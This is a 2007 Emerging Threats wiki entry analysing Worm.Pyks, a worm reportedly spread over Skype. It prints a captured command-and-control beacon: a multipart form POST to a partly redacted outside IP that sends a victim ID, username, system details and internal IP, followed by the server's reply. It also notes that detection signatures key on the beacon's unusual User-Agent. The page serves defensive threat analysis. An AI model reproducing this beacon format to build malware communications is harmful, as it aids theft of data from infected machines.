Worm.Pyks

Sample submitted anonymously, it was being pushed via skype reportedly. Has an unusual C&C mechanism. HTTP based, but pushes data by form posts, not in url variables like we'd normally see. The posts have a very unique UA, the sigs for now are just for that. Hopefully we'll find something else.

Below is a sample of the unusual C&C data push:

POST /ucps.php HTTP/1.1
Host: 67.29.130.xxx
User-Agent: h9tslbw0
Content-type: multipart/form-data; boundary=---------------------------zsTM3KE6QiueEnyt
Content-Length: 1115
Connection: close

-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="id"

HOME-KJZCRW7Q7Qxxxxxxxx
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="upt"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="mode"

1
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="version"

2.3.1.0
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="cpu"

2211
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="ram"

256
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="os"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="user"

victim
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="inip"

10.x.x.x
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="log"



#x:\xxxxx\pyks20070415212728#
=@64.22.77.xx@=
-----------------------------zsTM3KE6QiueEnyt--
HTTP/1.0 200 OK
Date: Sun, 15 Apr 2007 20:43:26 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Disposition: attachment; filename="a.exe"
Content-Length: 10
Content-Type: text/plain; charset=utf-8
Connection: close

Gi3V8u7JfH

More detail as we get it.

Related:

2018773 TWikiGuest 2017-08-08 - 01:12
WormPyks MattJonkman 2008-07-11 - 15:05
2003588 MattJonkman 2007-04-15 - 23:36
2003589 MattJonkman 2007-04-15 - 23:36

-- MattJonkman - 15 Apr 2007

Topic revision: r3 - 2008-07-11 - MattJonkman
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats